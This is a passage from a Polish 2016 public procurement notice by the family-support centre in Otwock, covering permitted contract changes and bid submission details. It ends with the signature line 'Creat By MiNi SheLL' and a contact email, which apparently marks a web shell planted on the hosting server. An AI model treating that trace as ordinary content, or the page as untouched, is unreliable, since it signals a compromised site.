7) w razie zaistnienia zdarzeń o charakterze działania siły wyższej, przez którą strony rozumieją klęski żywiołowe, stan wyjątkowy, działania terrorystyczne, strajk powszechny, nowe akty prawne lub decyzje właściwych władz, a także działania lub zaniechania działania organów państwowych, samorządowych lub osób trzecich uniemożliwiających terminową realizację zamówienia, o okres nie przekraczający czasu trwania przeszkody w wykonaniu zamówienia;
8)   nadzwyczajnych zdarzeń gospodarczych niezależnych od Zamawiającego , których Zamawiający  nie mógł przewidzieć w chwili zawarcia umowy; 
9)   zawieszenia przez Zamawiającego wykonania części lub całości robót na czas trwania       obiektywnej przeszkody; 
10) błędów w dokumentacji projektowej lub innych dokumentach budowy, których usunięcie będzie  poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie, innych dokumentach; 
11)  jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich        wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony        organ, z przyczyn niezależnych od Wykonawcy; 
12) w razie konieczności uzyskania dodatkowych opinii lub uzgodnień; 
13) zmian wynikających z konieczności wykonania robót niezwiązanych bezpośrednio 
z przedmiotem umowy i nieprzewidywalnych, których brak wykonania uniemożliwia 
lub utrudnia prawidłowe  wykonanie przedmiotu umowy; 
14) w razie udzielenia zamówienia dodatkowego zgodnie z art. 67 ust. l pkt. 5 ustawy Prawo zamówień publicznych, o okres wykonania zamówienia dodatkowego.
15) Termin zakończenia przedmiotu zamówienia może  zostać zmieniony  z uwzględnieniem  trwania przyczyny.
4. Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń przedstawionych 
w ofercie przetargowej pod warunkiem, że zmiany te będą korzystne dla Zamawiającego   Będą to, w szczególności, okoliczności:
1) konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy, 
przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane
w dokumentacji, a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy;
2) powodujące poprawienie parametrów technicznych;
3) wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów prawa;
4) dodatkowo możliwa jest zmiana producenta poszczególnych materiałów i urządzeń przedstawionych w ofercie przetargowej, pod warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych materiałów lub urządzeń.
5. Zmiany, o których mowa w niniejszym paragrafie muszą być każdorazowo zatwierdzone przez Zamawiającego, na podstawie uzgodnień przeprowadzonych z projektantem.
6.  Zmiany, o których mowa w ust.4  niniejszego paragrafu nie mogą spowodować zmiany wynagrodzenia umownego, o którym mowa w § 12 ust. 1  umowy.
7. Zmiany , dotyczące  udzielenia  dotychczasowemu  Wykonawcy  robót budowlanych, stanowiących nie więcej niż 50% wartości zamówienia  i polegającego na  powtórzeniu  tego samego  rodzaju zamówienia, które zostało przewidziane w rozdziale I art.2 § 7 SIWZ 
i w ogłoszeniu.
8. Zmiany przedstawicieli Zamawiającego i Wykonawcy oraz uczestników procesu inwestycyjnego w umowie, w szczególności kierownika budowy, pod warunkiem, że posiada on  kwalifikacje nie gorsze od osoby, którą zastąpi, za zgodą  Zamawiającego.
9. Zamawiający przewiduje możliwość zmiany odnośnie podwykonawstwa poprzez:
    1) wskazanie innych podwykonawców,
    2) rezygnację z podwykonawcy,
    3) wskazanie innego zakresu podwykonawstwa niż przedstawiony w ofercie,
    4) powierzenia realizacji części zamówienia podwykonawcom, pomimo niewskazania  
w ofercie żadnej części zamówienia  przeznaczonej do wykonania w ramach podwykonawstwa</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pcpr@pcprotwock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie, ul. Komunardów 10, 05-402 Otwock, pok.1-sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2016 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie, ul. Komunardów 10, 05-402 Otwock, pok.1-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com